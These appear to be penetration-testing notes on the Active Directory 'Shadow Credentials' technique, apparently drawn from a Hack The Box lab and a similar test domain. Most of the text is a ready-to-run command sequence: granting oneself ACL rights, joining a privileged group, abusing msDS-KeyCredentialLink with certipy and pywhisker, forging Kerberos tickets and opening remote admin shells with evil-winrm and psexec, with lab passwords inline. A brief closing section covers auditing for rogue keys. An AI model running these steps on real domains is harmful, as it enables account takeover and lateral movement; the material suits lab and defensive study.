Shadow Credentials
Overview
This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink
and append it with alternate credentials in the form of certificates.
Unless you have some rights in the Certerficate authority this attack will only be available in the key trust model.
Key trust
pros
Doesnt require ca to setup
Does use tpm cons
No centralized administration. Keys must be disabled per object
self signed cert (arguably the whole problem with this model)
Pre-requisites
Besides the ability to write the attribute msDS-KeyCredentialLink on a target user or computer, for this technique to work, the environment must be set up as follows:
At least one Windows Server 2016 Domain Controller.
A digital certificate for Server Authentication installed on the Domain Controller.
Windows Server 2016 Functional Level in Active Directory.
Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.
Domain must have at least one DC running with Windows Server 2016 that supports PKINIT.
Steps to perform - windows
$pass='AbsoluteLDAP2022!';$uname='absolute.htb\m.lovegod';$cred = new-object system.management.automation.pscredential($uname,$(convertto-securestring -asplaintext -force $pass))
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Network Audit" -Rights All -PrincipalIdentity m.lovegod -DomainController dc.absolute.htb
Add-DomainGroupMember -Credential $cred -Identity "Network Audit" -member m.lovegod -Domain "absolute.htb"
Get-DomainGroupMember -Credential $cred -Identity "Network Audit" -Domain "absolute.htb" -DomainController "dc.absolute.htb" | fl MemberName
kinit m.lovegod
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb
Steps to perform - Linux
#Install dacledit branch of impacket
git clone https://github.com/shutdown/impacket -b dacledit
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install .
#Write yourself some ACLs on the object
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!'
#Add yourself to the group
net rpc group addmem 'Network Audit' m.lovegod -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
#Verify
net rpc group members 'Network Audit' -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
#Use certipy for shadow credential
kinit m.lovegod #or impacket=gettgt
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb
#Restore ACLs
dacledit.py -action restore -file ./impacket/examples/dacledit-20240508-144024.bak -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!' -k
Performing with other tools
python3 pywhisker.py -d "zsm.local" -u "marcus" -p '!QAZ2wsx' -t 'ZPH-SVRMGMT1$' --action "add" -P P@ssw0rd -f cert
python ../PKINITtools/gettgtpkinit.py 'zsm.local/ZPH-SVRMGMT1$' -cert-pfx cert.pfx -pfx-pass P@ssw0rd zph-svrmgmt1.ccache
export KRB5CCNAME=zph-svrmgmt1.ccache
python ../PKINITtools/gets4uticket.py kerberos+ccache://'zsm.local\ZPH-SVRMGMT1$':zph-svrmgmt1.ccache@192.168.210.10 cifs/zph-svrmgmt1.zsm.local@zsm.local administrator@zsm.local admin.ccache -v
export KRB5CCNAME=admin.ccache
impacket-psexec -k ZPH-SVRMGMT1.ZSM.LOCAL
AD Auditing
![[Pasted image 20240510073403.png]] This can be used to find orphaned or malicious keys existing in AD.
Also the DSInternals module can find ROCA vulnerable / weak keys in AD
cleaning up a user and device object in ad will affect ALL devices a user has access to (DSInternals allows selective deletion of keys) ![[Pasted image 20240510074200.png]]![[Pasted image 20240510074315.png]]